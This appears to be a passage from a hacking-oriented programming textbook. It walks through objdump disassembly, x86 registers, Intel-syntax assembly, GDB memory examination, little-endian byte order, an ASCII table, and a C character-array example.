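The objdump program will spit out far too many lines of output to sensibly examine, so the output is piped into grep with the command-line option to only display 20 lines after the regular expression main.:. Each byte is represented in hexadecimal notation, which is a base-16 numbering system. The numbering system you are most familiar with uses a base-10 system, since at 10 you need to add an extra symbol. Hexadecimal uses 0 through 9 to represent 0 through 9, but it also uses A through F to represent the values 10 through 15. This is a convenient notation since a byte contains 8 bits, each of which can be either true or false. This means a byte has 256 (2⁸) possible values, so each byte can be described with 2 hexadecimal digits.

The hexadecimal numbers on the far left (starting with 0x8048374) are memory addresses. The bits of the machine language instructions must be housed somewhere, and this somewhere is called memory. Memory is just a collection of bytes of temporary storage space that are numbered with addresses.

Like a row of houses on a local street, each with its own address, memory can be thought of as a row of bytes, each with its own memory address. Each byte of memory can be accessed by its address, and in this case the CPU accesses this part of memory to retrieve the machine language instructions that make up the compiled program. Older Intel x86 processors use a 32-bit addressing scheme, while newer ones use a 64-bit one. The 32-bit processors have 2³² (or 4,294,967,296) possible addresses, while the newer ones have 2⁶⁴ (about 1.84467441 x 10¹⁹) possible addresses. The 64-bit processors can run in 32-bit compatibility mode, which allows them to run 32-bit code quickly.

The hexadecimal bytes in the middle of the listing above are the machine language instructions for the x86 processor. Of course, these hexadecimal values are only representations of the bytes of binary 1s and 0s the CPU can understand. But since 0101010110001001111001011000001111101100111100001… isn't very useful to anything other than the processor, the machine code is displayed as hexadecimal bytes and each instruction is put on its own line, like splitting a paragraph into sentences.

Come to think of it, the hexadecimal bytes really aren't very useful themselves, either; that's where assembly language comes in. The instructions on the far right are in assembly language. Assembly language is really just a collection of mnemonics for the corresponding machine language instructions. The instruction ret is far easier to remember and make sense of than 0xc3 or 11000011. Unlike C and other compiled languages, assembly language instructions have a direct one-to-one relationship with their corresponding machine language instructions. This means that since every processor architecture has different machine language instructions, each also has a different form of assembly language. Assembly is just a way for programmers to represent the machine language instructions that are given to the processor. Exactly how these machine language instructions are represented is simply a matter of convention and preference. While you can theoretically create your own x86 assembly language syntax, most people stick with one of the two main types: AT&T syntax and Intel syntax. The assembly shown in the objdump output above is AT&T syntax, as just about all of Linux's disassembly tools use this syntax by default. It's easy to recognize AT&T syntax by the cacophony of % and $ symbols prefixing everything (take another look at the example above). The same code can be shown in Intel syntax by providing an additional command-line option, -M intel, to objdump, as shown in the output below.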

reader@hacking:~/booksrc $ objdump -M intel -D a.out | grep -A20 main.:
08048374 <main>:
 8048374:       55                      push   ebp
 8048375:       89 e5                   mov    ebp,esp
 8048377:       83 ec 08                sub    esp,0x8
 804837a:       83 e4 f0                and    esp,0xfffffff0
 804837d:       b8 00 00 00 00          mov    eax,0x0
 8048382:       29 c4                   sub    esp,eax
 8048384:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-4],0x0
 804838b:       83 7d fc 09             cmp    DWORD PTR [ebp-4],0x9
 804838f:       7e 02                   jle    8048393 <main+0x1f>
 8048391:       eb 13                   jmp    80483a6 <main+0x32>
 8048393:       c7 04 24 84 84 04 08    mov    DWORD PTR [esp],0x8048484
 804839a:       e8 01 ff ff ff          call   80482a0 <printf@plt>
 804839f:       8d 45 fc                lea    eax,[ebp-4]
 80483a2:       ff 00                   inc    DWORD PTR [eax]
 80483a4:       eb e5                   jmp    804838b <main+0x17>
 80483a6:       c9                      leave
 80483a7:       c3                      ret
 80483a8:       90                      nop
 80483a9:       90                      nop
 80483aa:       90                      nop
reader@hacking:~/booksrc $

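Personally, I think Intel syntax is much more readable and easier to understand, so for the purposes of this book, I will try to stick with this syntax. Regardless of the assembly language representation, the commands a processor understands are quite simple. These instructions consist of an operation and sometimes additional arguments that describe the destination and/or the source for the operation. These operations move memory around, perform some sort of basic math, or interrupt the processor to get it to do something else. In the end, that's all a computer processor can really do. But in the same way millions of books have been written using a relatively small alphabet of letters, an infinite number of possible programs can be created using a relatively small collection of machine instructions.

Processors also have their own set of special variables called registers. Most of the instructions use these registers to read or write data, so understanding the registers of a processor is essential to understanding the instructions. The bigger picture keeps getting bigger....

The x86 Processor

The 8086 CPU was the first x86 processor. It was developed and manufactured by Intel, which later developed more advanced processors in the same family: the 80186, 80286, 80386, and 80486. If you remember people talking about 386 and 486 processors in the '80s and '90s, this is what they were referring to.

The x86 processor has several registers, which are like internal variables for the processor. I could just talk abstractly about these registers now, but I think it's always better to see things for yourself. The GNU development tools also include a debugger called GDB. Debuggers are used by programmers to step through compiled programs, examine program memory, and view processor registers. A programmer who has never used a debugger to look at the inner workings of a program is like a seventeenth-century doctor who has never used a microscope. Similar to a microscope, a debugger allows a hacker to observe the microscopic world of machine code, but a debugger is far more powerful than this metaphor allows. Unlike a microscope, a debugger can view the execution from all angles, pause it, and change anything along the way.

Below, GDB is used to show the state of the processor registers right before the program starts.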

reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, 0x0804837a in main ()
(gdb) info registers
eax            0xbffff894       -1073743724
ecx            0x48e0fe81       1222704769
edx            0x1      1
ebx            0xb7fd6ff4       -1208127500
esp            0xbffff800       0xbffff800
ebp            0xbffff808       0xbffff808
esi            0xb8000ce0       -1207956256
edi            0x0      0
eip            0x804837a        0x804837a <main+6>
eflags         0x286    [ PF SF IF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $

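A breakpoint is set on the main() function so execution will stop right before our code is executed. Then GDB runs the program, stops at the breakpoint, and is told to display all the processor registers and their current states.

The first four registers (EAX, ECX, EDX, and EBX) are known as general-purpose registers. These are called the Accumulator, Counter, Data, and Base registers, respectively. They are used for a variety of purposes, but they mainly act as temporary variables for the CPU when it is executing machine instructions.

The second four registers (ESP, EBP, ESI, and EDI) are also general-purpose registers, but they are sometimes known as pointers and indexes. These stand for Stack Pointer, Base Pointer, Source Index, and Destination Index, respectively. The first two registers are called pointers because they store 32-bit addresses, which essentially point to that location in memory. These registers are fairly important to program execution and memory management; we will discuss them more later. The last two registers are also technically pointers, which are commonly used to point to the source and destination when data needs to be read from or written to. There are load and store instructions that use these registers, but for the most part, these registers can be thought of as just simple general-purpose registers.

The EIP register is the Instruction Pointer register, which points to the current instruction the processor is reading. Like a child pointing his finger at each word as he reads, the processor reads each instruction using the EIP register as its finger. Naturally, this register is quite important and will be used a lot while debugging. Currently, it points to a memory address at 0x804837a.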

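The EFLAGS register consists of several bit flags that are used for comparisons. The remaining registers (CS, SS, DS, ES, FS, and GS) are segment registers used for memory segmentation. The actual memory is split into several different segments, which will be discussed later, and these registers keep track of that. For the most part, these registers can be ignored since they rarely need to be accessed directly.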

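Assembly Language

Since we are using Intel syntax assembly language for this book, our tools must be configured to use this syntax. Inside GDB, the disassembly syntax can be set to Intel by simply typing set disassembly intel or set dis intel, for short. (Both abbreviate the full setting name, set disassembly-flavor intel; if a newer GDB version reports the short form as ambiguous, use the full name.) You can configure this setting to run every time GDB starts up by putting the command in the file .gdbinit in your home directory.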

reader@hacking:~/booksrc $ gdb -q
(gdb) set dis intel
(gdb) quit
reader@hacking:~/booksrc $ echo "set dis intel" > ~/.gdbinit
reader@hacking:~/booksrc $ cat ~/.gdbinit
set dis intel
reader@hacking:~/booksrc $

Now that GDB is configured to use Intel syntax, let's begin understanding it. The assembly instructions in Intel syntax generally follow this style:

operation <destination>, <source>

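The destination and source values will either be a register, a memory address, or a value. The operations are usually intuitive mnemonics: the mov operation will move a value from the source to the destination, sub will subtract, inc will increment, and so forth. For example, the instructions below will move the value from ESP to EBP and then subtract 8 from ESP (storing the result in ESP).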

8048375:        89 e5                 mov    ebp,esp
8048377:        83 ec 08              sub    esp,0x8

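There are also operations that are used to control the flow of execution. The cmp operation is used to compare values, and basically any operation beginning with j is used to jump to a different part of the code (depending on the result of the comparison). The example below first compares a 4-byte value located at EBP minus 4 with the number 9. The next instruction is shorthand for jump if less than or equal to, referring to the result of the previous comparison. If that value is less than or equal to 9, execution jumps to the instruction at 0x8048393. Otherwise, execution flows to the next instruction, which is an unconditional jump. So if the value isn't less than or equal to 9, execution will jump to 0x80483a6.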

804838b:        83 7d fc 09           cmp    DWORD PTR [ebp-4],0x9
804838f:        7e 02                 jle    8048393 <main+0x1f>
8048391:        eb 13                 jmp    80483a6 <main+0x32>

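These examples have been from our previous disassembly, and we have our debugger configured to use Intel syntax, so let's use the debugger to step through the first program at the assembly instruction level.

The -g flag can be used by the GCC compiler to include extra debugging information, which will give GDB access to the source code.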

reader@hacking:~/booksrc $ gcc -g firstprog.c 
reader@hacking:~/booksrc $ ls -l a.out
-rwxr-xr-x 1 matrix users 11977 Jul 4 17:29 a.out
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2
3       int main()
4       {
5               int i;
6               for(i=0; i < 10; i++)
7               {
8                       printf("Hello, world!\n");
9               }
10      }
(gdb) disassemble main
Dump of assembler code for function main():
0x08048384 <main+0>:    push   ebp
0x08048385 <main+1>:    mov    ebp,esp
0x08048387 <main+3>:    sub    esp,0x8
0x0804838a <main+6>:    and    esp,0xfffffff0
0x0804838d <main+9>:    mov    eax,0x0
0x08048392 <main+14>:   sub    esp,eax
0x08048394 <main+16>:   mov    DWORD PTR [ebp-4],0x0
0x0804839b <main+23>:   cmp    DWORD PTR [ebp-4],0x9
0x0804839f <main+27>:   jle    0x80483a3 <main+31>
0x080483a1 <main+29>:   jmp    0x80483b6 <main+50>
0x080483a3 <main+31>:   mov    DWORD PTR [esp],0x80484d4
0x080483aa <main+38>:   call   0x80482a8 <_init+56>
0x080483af <main+43>:   lea    eax,[ebp-4]
0x080483b2 <main+46>:   inc    DWORD PTR [eax]
0x080483b4 <main+48>:   jmp    0x804839b <main+23>
0x080483b6 <main+50>:   leave
0x080483b7 <main+51>:   ret
End of assembler dump.
(gdb) break main
Breakpoint 1 at 0x8048394: file firstprog.c, line 6.
(gdb) run
Starting program: /hacking/a.out

Breakpoint 1, main() at firstprog.c:6
6               for(i=0; i < 10; i++)
(gdb) info register eip
eip            0x8048394        0x8048394
(gdb)

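First, the source code is listed and the disassembly of the main() function is displayed. Then a breakpoint is set at the start of main(), and the program is run. This breakpoint simply tells the debugger to pause the execution of the program when it gets to that point. Since the breakpoint has been set at the start of the main() function, the program hits the breakpoint and pauses before actually executing any instructions in main(). Then the value of EIP (the Instruction Pointer) is displayed.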

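Notice that EIP contains a memory address that points to an instruction in the main() function's disassembly (the mov at <main+16>). The instructions before it (<main+0> through <main+14>) are collectively known as the function prologue and are generated by the compiler to set up memory for the rest of the main() function's local variables. Part of the reason variables need to be declared in C is to aid the construction of this section of code. The debugger knows this part of the code is automatically generated and is smart enough to skip over it. We'll talk more about the function prologue later, but for now we can take a cue from GDB and skip it.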

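The GDB debugger provides a direct method to examine memory, using the command x, which is short for examine. Examining memory is a critical skill for any hacker. Most hacker exploits are a lot like magic tricks: they seem amazing and magical, unless you know about sleight of hand and misdirection. In both magic and hacking, if you were to look in just the right spot, the trick would be obvious. That's one of the reasons a good magician never does the same trick twice. But with a debugger like GDB, every aspect of a program's execution can be deterministically examined, paused, stepped through, and repeated as often as needed. Since a running program is mostly just a processor and segments of memory, examining memory is the first way to look at what's really going on.

The examine command in GDB can be used to look at a certain address of memory in a variety of ways. This command expects two arguments when it's used: the location in memory to examine and how to display that memory.

The display format also uses a single-letter shorthand, which is optionally preceded by a count of how many items to examine. Some common format letters are as follows: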

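`o` Display in octal.
`x` Display in hexadecimal.
`u` Display in unsigned, standard base-10 decimal.
`t` Display in binary.

These can be used with the examine command to examine a certain memory address. In the following example, the current address of the EIP register is used. Shorthand commands are often used with GDB, and even info register eip can be shortened to just i r eip.

(gdb) i r eip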
eip            0x8048384        0x8048384 <main+16>
(gdb) x/o 0x8048384
0x8048384 <main+16>:    077042707
(gdb) x/x $eip
0x8048384 <main+16>:    0x00fc45c7
(gdb) x/u $eip
0x8048384 <main+16>:    16532935
(gdb) x/t $eip
0x8048384 <main+16>:    00000000111111000100010111000111
(gdb)

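The memory the EIP register is pointing to can be examined by using the address stored in EIP. The debugger lets you reference registers directly, so $eip is equivalent to the value EIP contains at that moment. The value 077042707 in octal is the same as 0x00fc45c7 in hexadecimal, which is the same as 16532935 in base-10 decimal, which in turn is the same as 00000000111111000100010111000111 in binary. A number can also be prepended to the format of the examine command to examine multiple units at the target address.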

(gdb) x/2x $eip
0x8048384 <main+16>:    0x00fc45c7     0x83000000
(gdb) x/12x $eip
0x8048384 <main+16>:    0x00fc45c7     0x83000000     0x7e09fc7d     0xc713eb02
0x8048394 <main+32>:    0x84842404     0x01e80804     0x8dffffff     0x00fffc45
0x80483a4 <main+48>:    0xc3c9e5eb     0x90909090     0x90909090     0x5de58955
(gdb)

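The default size of a single unit is a four-byte unit called a word. The size of the display units for the examine command can be changed by adding a size letter to the end of the format letter. The valid size letters are as follows:

`b` A single byte
`h` A halfword, which is two bytes in size
`w` A word, which is four bytes in size
`g` A giant, which is eight bytes in size

This is slightly confusing, because sometimes the term word also refers to 2-byte values. In this case a double word or DWORD refers to a 4-byte value. In this book, words and DWORDs both refer to 4-byte values. If I'm talking about a 2-byte value, I'll call it a short or a halfword. The following GDB output shows memory displayed in various sizes.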

(gdb) x/8xb $eip
0x8048384 <main+16>:    0xc7    0x45    0xfc    0x00    0x00    0x00    0x00    0x83
(gdb) x/8xh $eip
0x8048384 <main+16>:    0x45c7  0x00fc  0x0000  0x8300  0xfc7d  0x7e09  0xeb02  0xc713
(gdb) x/8xw $eip
0x8048384 <main+16>:    0x00fc45c7      0x83000000      0x7e09fc7d      0xc713eb02
0x8048394 <main+32>:    0x84842404      0x01e80804      0x8dffffff      0x00fffc45 
(gdb)

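If you look closely, you may notice something odd about the data above. The first examine command shows the first eight bytes, and naturally, the examine commands that use bigger units display more data in total. However, the first examine shows the first two bytes to be 0xc7 and 0x45, but when a halfword is examined at the exact same memory address, the value 0x45c7 is shown, with the bytes reversed. This same byte-reversal effect can be seen when a full four-byte word is shown as 0x00fc45c7, but when the first four bytes are shown byte by byte, they are in the order of 0xc7, 0x45, 0xfc, and 0x00.

This is because on the x86 processor values are stored in little-endian byte order, which means the least significant byte is stored first. For example, if four bytes are to be interpreted as a single value, the bytes must be used in reverse order. The GDB debugger is smart enough to know how values are stored, so when a word or halfword is examined, the bytes must be reversed to display the correct values in hexadecimal. Revisiting these values displayed both as hexadecimal and unsigned decimals might help clear up any confusion.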

(gdb) x/4xb $eip
0x8048384 <main+16>:    0xc7    0x45    0xfc    0x00
(gdb) x/4ub $eip
0x8048384 <main+16>:    199     69      252     0
(gdb) x/1xw $eip
0x8048384 <main+16>:    0x00fc45c7
(gdb) x/1uw $eip
0x8048384 <main+16>:    16532935
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $ bc -ql
199*(256^3) + 69*(256^2) + 252*(256^1) + 0*(256^0)
3343252480
0*(256^3) + 252*(256^2) + 69*(256^1) + 199*(256^0)
16532935
quit
reader@hacking:~/booksrc $

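The first four bytes are shown both in hexadecimal and standard unsigned decimal notation. A command-line calculator program called bc is used to show that if the bytes are interpreted in the incorrect order, a horribly incorrect value of 3343252480 is the result. The byte order of a given architecture is an important detail to be aware of. While most debugging tools and compilers will take care of the details of byte order automatically, eventually you will be directly manipulating memory by yourself.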

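In addition to converting byte order, GDB can do other conversions with the examine command. We've already seen that GDB can disassemble machine language instructions into human-readable assembly instructions. The examine command also accepts the format letter i, short for instruction, to display the memory as disassembled assembly language instructions.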

reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048384: file firstprog.c, line 6.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at firstprog.c:6
6         for(i=0; i < 10; i++)
(gdb) i r $eip
eip            0x8048384        0x8048384 <main+16>
(gdb) x/i $eip
0x8048384 <main+16>:    mov    DWORD PTR [ebp-4],0x0
(gdb) x/3i $eip
0x8048384 <main+16>:    mov    DWORD PTR [ebp-4],0x0
0x804838b <main+23>:    cmp    DWORD PTR [ebp-4],0x9
0x804838f <main+27>:    jle    0x8048393 <main+31>
(gdb) x/7xb $eip
0x8048384 <main+16>:    0xc7    0x45    0xfc    0x00    0x00    0x00    0x00
(gdb) x/i $eip
0x8048384 <main+16>:    mov    DWORD PTR [ebp-4],0x0
(gdb)

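In the output above, the a.out program is run in GDB, with a breakpoint set at main(). Since the EIP register is pointing to memory that actually contains machine language instructions, they disassemble quite nicely.

The previous objdump disassembly confirms that the seven bytes EIP is pointing to actually are machine language for the corresponding assembly instruction.

8048384:      c7 45 fc 00 00 00 00   mov   DWORD PTR [ebp-4],0x0

This assembly instruction will move the value of 0 into memory located at the address stored in the EBP register, minus 4. This is where the C variable i is stored in memory; i was declared as an integer that uses 4 bytes of memory on the x86 processor. Basically, this command will zero out the variable i for the for loop. If that memory is examined right now, it will contain nothing but random garbage. The memory at this location can be examined several different ways.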

(gdb) i r ebp
ebp            0xbffff808       0xbffff808
(gdb) x/4xb $ebp - 4
0xbffff804:     0xc0    0x83    0x04    0x08
(gdb) x/4xb 0xbffff804
0xbffff804:     0xc0    0x83    0x04    0x08
(gdb) print $ebp - 4
$1 = (void *) 0xbffff804
(gdb) x/4xb $1
0xbffff804:     0xc0    0x83    0x04    0x08
(gdb) x/xw $1
0xbffff804:     0x080483c0
(gdb)

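The EBP register is shown to contain the address 0xbffff808, and the assembly instruction will write to a location 4 bytes below that, at 0xbffff804. The examine command can inspect this memory address directly or compute it on the fly. The print command can also be used to do simple math, and its result is stored in a temporary variable in the debugger. This variable, named $1, can be used later to quickly return to a particular location in memory. Any of the methods shown above accomplishes the same task: displaying the 4 garbage bytes in memory that will be zeroed out when the current instruction executes.

Let's execute the current instruction using the nexti command, short for next instruction. The processor will read the instruction at EIP, execute it, and advance EIP to the next instruction.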

(gdb) nexti
0x0804838b      6        for(i=0; i < 10; i++)
(gdb) x/4xb $1
0xbffff804:     0x00   0x00    0x00    0x00
(gdb) x/dw $1
0xbffff804:     0
(gdb) i r eip
eip            0x804838b       0x804838b <main+23>
(gdb) x/i $eip
0x804838b <main+23>:    cmp   DWORD PTR [ebp-4],0x9
(gdb)

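As predicted, the previous instruction zeroes out the 4 bytes found at EBP minus 4, which is the memory set aside for the C variable i. EIP then advances to the next instruction. The next few instructions make more sense discussed as a group.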

(gdb) x/10i $eip
0x804838b <main+23>:   cmp   DWORD PTR [ebp-4],0x9
0x804838f <main+27>:   jle   0x8048393 <main+31>
0x8048391 <main+29>:   jmp   0x80483a6 <main+50>
0x8048393 <main+31>:   mov   DWORD PTR [esp],0x8048484
0x804839a <main+38>:   call  0x80482a0 <printf@plt>
0x804839f <main+43>:   lea   eax,[ebp-4]
0x80483a2 <main+46>:   inc   DWORD PTR [eax]
0x80483a4 <main+48>:   jmp   0x804838b <main+23>
0x80483a6 <main+50>:   leave
0x80483a7 <main+51>:   ret
(gdb)

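The first instruction, cmp, is a compare instruction that compares the memory used by the C variable i with the value 9. The next instruction, jle, stands for jump if less than or equal to. It uses the result of the previous comparison (which is actually stored in the EFLAGS register) to decide whether to jump EIP to a different part of the code. The jump is taken if the destination of the previous comparison is less than or equal to the source. In this case, the instruction says to jump to the address 0x8048393 if the value stored in memory for the C variable i is less than or equal to 9. If that isn't the case, EIP continues to the next instruction, which is an unconditional jump that sends EIP to the address 0x80483a6. These three instructions combine to create an if-then-else control structure: if i is less than or equal to 9, go to the instruction at address 0x8048393; otherwise, go to the instruction at address 0x80483a6. The first address, 0x8048393, is simply the instruction found right after the unconditional jump, and the second address, 0x80483a6, is located at the end of the function.

Since we know the value 0 is stored in the memory location being compared with 9, and we know that 0 is less than or equal to 9, EIP should be at 0x8048393 after the next two instructions execute.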

(gdb) nexti
0x0804838f      6          for(i=0; i < 10; i++)
(gdb) x/i $eip
0x804838f <main+27>:     jle    0x8048393 <main+31>
(gdb) nexti
8            printf("Hello, world!\n");
(gdb) i r eip
eip            0x8048393        0x8048393 <main+31>
(gdb) x/2i $eip
0x8048393 <main+31>:    mov    DWORD PTR [esp],0x8048484
0x804839a <main+38>:    call   0x80482a0 <printf@plt>
(gdb)

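As expected, the previous two instructions let program execution flow down to 0x8048393, which brings us to the next two instructions. The first is another mov instruction, which writes the address 0x8048484 into the memory address contained in the ESP register. But what is ESP pointing to?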

	(gdb) i r esp
	esp           0xbffff800       0xbffff800
	(gdb)

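Currently, ESP points to the memory address 0xbffff800, so when the mov instruction executes, the address 0x8048484 is written there. But why? What's so special about the memory address 0x8048484? There's one way to find out.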

	(gdb) x/2xw 0x8048484
	0x8048484:      0x6c6c6548      0x6f57206f
	(gdb) x/6xb 0x8048484
	0x8048484:      0x48    0x65    0x6c   0x6c   0x6f   0x20
	(gdb) x/6ub 0x8048484
	0x8048484:      72      101     108    108    111    32
	(gdb)

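A trained eye might notice something about the memory here, in particular the range of the bytes. After examining memory long enough, these kinds of visual patterns become more apparent. These bytes fall within the printable ASCII range. ASCII is an agreed-upon standard that maps all the characters on your keyboard (and some that aren't) to fixed numbers. The bytes 0x48, 0x65, 0x6c, and 0x6f all correspond to letters of the alphabet in the ASCII table shown below. This table is found in the man page for ascii, available on most Unix systems by typing man ascii.

ASCII Table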

	Oct   Dec   Hex   Char           Oct   Dec   Hex   Char
	------------------------------------------------------------
	000   0     00    NUL '\0'       100   64    40    @
	001   1     01    SOH            101   65    41    A
	002   2     02    STX            102   66    42    B
	003   3     03    ETX            103   67    43    C
	004   4     04    EOT            104   68    44    D
	005   5     05    ENQ            105   69    45    E
	006   6     06    ACK            106   70    46    F
	007   7     07    BEL '\a'       107   71    47    G
	010   8     08    BS  '\b'       110   72    48    H
	011   9     09    HT  '\t'       111   73    49    I
	012   10    0A    LF  '\n'       112   74    4A    J
	013   11    0B    VT  '\v'       113   75    4B    K
	014   12    0C    FF  '\f'       114   76    4C    L
	015   13    0D    CR  '\r'       115   77    4D    M
	016   14    0E    SO             116   78    4E    N
	017   15    0F    SI             117   79    4F    O
	020   16    10    DLE            120   80    50    P
	021   17    11    DC1            121   81    51    Q
	022   18    12    DC2            122   82    52    R
	023   19    13    DC3            123   83    53    S
	024   20    14    DC4            124   84    54    T
	025   21    15    NAK            125   85    55    U
	026   22    16    SYN            126   86    56    V
	027   23    17    ETB            127   87    57    W
	030   24    18    CAN            130   88    58    X
	031   25    19    EM             131   89    59    Y
	032   26    1A    SUB            132   90    5A    Z
	033   27    1B    ESC            133   91    5B    [
	034   28    1C    FS             134   92    5C    \   '\\'
	035   29    1D    GS             135   93    5D    ]
	036   30    1E    RS             136   94    5E    ^
	037   31    1F    US             137   95    5F    _
	040   32    20    SPACE          140   96    60    `
	041   33    21    !              141   97    61    a
	042   34    22    "              142   98    62    b
	043   35    23    #              143   99    63    c
	044   36    24    $              144   100   64    d
	045   37    25    %              145   101   65    e
	046   38    26    &              146   102   66    f
	047   39    27    '              147   103   67    g
	050   40    28    (              150   104   68    h
	051   41    29    )              151   105   69    i
	052   42    2A    *              152   106   6A    j
	053   43    2B    +              153   107   6B    k
	054   44    2C    ,              154   108   6C    l
	055   45    2D    -              155   109   6D    m
	056   46    2E    .              156   110   6E    n
	057   47    2F    /              157   111   6F    o
	060   48    30    0              160   112   70    p
	061   49    31    1              161   113   71    q
	062   50    32    2              162   114   72    r
	063   51    33    3              163   115   73    s
	064   52    34    4              164   116   74    t
	065   53    35    5              165   117   75    u
	066   54    36    6              166   118   76    v
	067   55    37    7              167   119   77    w
	070   56    38    8              170   120   78    x
	071   57    39    9              171   121   79    y
	072   58    3A    :              172   122   7A    z
	073   59    3B    ;              173   123   7B    {
	074   60    3C    <              174   124   7C    |
	075   61    3D    =              175   125   7D    }
	076   62    3E    >              176   126   7E    ~
	077   63    3F    ?              177   127   7F    DEL

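Thankfully, GDB's examine command also has provisions for looking at this type of memory. The c format letter can be used to automatically look up a byte in the ASCII table, and the s format letter displays an entire string of character data.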

(gdb) x/6cb 0x8048484
0x8048484:      72 'H'  101 'e' 108 'l' 108 'l' 111 'o' 32 ' '
(gdb) x/s 0x8048484
0x8048484:       "Hello, world!\n"
(gdb)

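These commands reveal that the data string "Hello, world!\n" is stored at memory address 0x8048484. This string is the argument for the printf() function, which indicates that writing this string's address (0x8048484) to the location ESP points to has something to do with that function. The following output shows the string's address being written to the address ESP points to.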

(gdb) x/2i $eip
0x8048393 <main+31>:    mov    DWORD PTR [esp],0x8048484
0x804839a <main+38>:    call   0x80482a0 <printf@plt>
(gdb) x/xw $esp
0xbffff800:     0xb8000ce0
(gdb) nexti
0x0804839a      8           printf("Hello, world!\n");
(gdb) x/xw $esp
0xbffff800:     0x08048484 
(gdb)

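The next instruction is the actual call to the printf() function, which prints the data string. The previous instruction was setting up for the function call, and the result of the call can be seen in the output below.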

(gdb) x/i $eip
0x804839a <main+38>:    call   0x80482a0 <printf@plt>
(gdb) nexti
Hello, world!
6         for(i=0; i < 10; i++)
(gdb)

Continuing to use GDB to debug, let's examine the next two instructions. Once again, they make more sense looked at as a group.

(gdb) x/2i $eip
0x804839f <main+43>:    lea    eax,[ebp-4]
0x80483a2 <main+46>:    inc    DWORD PTR [eax]
(gdb)

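These two instructions basically just increment the variable i by 1. The lea instruction is short for Load Effective Address; it loads the familiar address of EBP minus 4 into the EAX register. The execution of this instruction is shown below.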

(gdb) x/i $eip
0x804839f <main+43>:    lea    eax,[ebp-4]
(gdb) print $ebp - 4
$2 = (void *) 0xbffff804
(gdb) x/x $2
0xbffff804:     0x00000000
(gdb) i r eax
eax            0xd      13
(gdb) nexti
0x080483a2      6         for(i=0; i < 10; i++)
(gdb) i r eax
eax            0xbffff804       -1073743868
(gdb) x/xw $eax
0xbffff804:     0x00000000
(gdb) x/dw $eax
0xbffff804:     0
(gdb)

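The following inc instruction increments the value found at this address (now stored in the EAX register) by 1. The execution of this instruction is also shown below.

(gdb) x/i $eip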
0x80483a2 <main+46>:    inc    DWORD PTR [eax]
(gdb) x/dw $eax
0xbffff804:     0
(gdb) nexti
0x080483a4      6         for(i=0; i < 10; i++)
(gdb) x/dw $eax
0xbffff804:     1
(gdb)

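The end result is that the value stored at the memory address EBP minus 4 (0xbffff804) is incremented by 1. This behavior corresponds to the portion of C code in which the variable i is incremented in the for loop.

The next instruction is an unconditional jump instruction.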

(gdb) x/i $eip
0x80483a4 <main+48>:    jmp    0x804838b <main+23> 
(gdb)

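When this instruction is executed, it sends the program back to the instruction at address 0x804838b. It does this by simply setting EIP to that value.

Looking at the full disassembly again, you should be able to tell which parts of the C code have been compiled into which machine instructions.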

(gdb) disass main
Dump of assembler code for function main:
0x08048374 <main+0>:    push   ebp
0x08048375 <main+1>:    mov    ebp,esp
0x08048377 <main+3>:    sub    esp,0x8
0x0804837a <main+6>:    and    esp,0xfffffff0
0x0804837d <main+9>:    mov    eax,0x0
0x08048382 <main+14>:   sub    esp,eax
0x08048384 <main+16>:   mov    DWORD PTR [ebp-4],0x0
0x0804838b <main+23>:   cmp    DWORD PTR [ebp-4],0x9
0x0804838f <main+27>:   jle    0x8048393 <main+31>
0x08048391 <main+29>:   jmp    0x80483a6 <main+50>
0x08048393 <main+31>:   mov    DWORD PTR [esp],0x8048484
0x0804839a <main+38>:   call   0x80482a0 <printf@plt>
0x0804839f <main+43>:   lea    eax,[ebp-4]
0x080483a2 <main+46>:   inc    DWORD PTR [eax]
0x080483a4 <main+48>:   jmp    0x804838b <main+23>
0x080483a6 <main+50>:   leave
0x080483a7 <main+51>:   ret
End of assembler dump.
(gdb) list
1       #include <stdio.h>
2
3       int main()
4       {
5         int i;
6         for(i=0; i < 10; i++)
7         {
8           printf("Hello, world!\n");
9         }
10      } 
(gdb)

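The instructions from main+16 through main+29 and from main+43 through main+48 make up the for loop, and the two instructions at main+31 and main+38 are the printf() call found within the loop. Program execution jumps back to the compare instruction, continues to execute the printf() call, and increments the counter variable until it finally equals 10. At that point the conditional jle instruction doesn't jump; instead, the instruction pointer continues to the unconditional jump instruction, which exits the loop and ends the program.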

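Back to Basics

Now that the idea of programming is less abstract, there are a few other important concepts to know about C. Assembly language and computer processors existed before higher-level programming languages, and many modern programming concepts have evolved over time. In the same way that knowing a little Latin can greatly improve one's understanding of English, knowledge of low-level programming concepts can help with understanding higher-level ones. When continuing to the next section, remember that C code must be compiled into machine instructions before it can do anything.

Strings

The value "Hello, world!\n" passed to the printf() function in the previous program is a string; technically, a character array. In C, an array is simply a list of n elements of a specific data type. A 20-character array is simply 20 adjacent characters located in memory. Arrays are also referred to as buffers. The char_array.c program is an example of a character array.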

char_array.c

#include <stdio.h>
int main()
{
  char str_a[20];
  str_a[0]  = 'H';
  str_a[1]  = 'e';
  str_a[2]  = 'l';
  str_a[3]  = 'l';
  str_a[4]  = 'o';
  str_a[5]  = ',';
  str_a[6]  = ' ';
  str_a[7]  = 'w';
  str_a[8]  = 'o';
  str_a[9]  = 'r';
  str_a[10] = 'l';
  str_a[11] = 'd';
  str_a[12] = '!';
  str_a[13] = '\n';
  str_a[14] = 0;
  printf(str_a);
}

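The GCC compiler can also be given the -o switch to define the output file to compile to. This switch is used below to compile the program into an executable binary called char_array.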

reader@hacking:~/booksrc $ gcc -o char_array char_array.c
reader@hacking:~/booksrc $ ./char_array
Hello, world!
reader@hacking:~/booksrc $

